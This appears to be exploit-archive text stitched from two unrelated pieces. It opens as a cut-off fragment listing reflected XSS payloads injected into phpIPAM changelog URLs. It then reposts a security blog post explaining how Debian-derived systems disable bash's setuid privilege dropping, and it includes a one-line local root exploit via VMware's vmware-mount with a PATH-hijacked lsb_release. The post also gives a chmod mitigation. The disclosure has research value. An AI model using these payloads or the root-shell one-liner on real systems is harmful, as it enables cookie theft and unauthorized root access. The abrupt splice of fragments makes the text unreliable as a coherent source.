closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
Method: GET
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
// Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.
488
489 if (running_setuid && privileged_mode == 0)
490 disable_priv_mode ();
491
Where disable_priv_mode is defined as:
1202 void
1203 disable_priv_mode ()
1204 {
1205 setuid (current_user.uid);
1206 setgid (current_user.gid);
1207 current_user.euid = current_user.uid;
1208 current_user.egid = current_user.gid;
1209 }
Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:
307 /* Turning off -p? */
308 if (f == FPRIVILEGED && oldval && !newval) {
309 #ifdef OS2
310 ;
311 #else /* OS2 */
312 setuid(ksheuid = getuid());
313 setgid(getgid());
314 #endif /* OS2 */
315 } else if (f == FPOSIX && newval) {
This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.
However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:
$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:
# chmod u-s /usr/bin/vmware-mount
Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.
In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.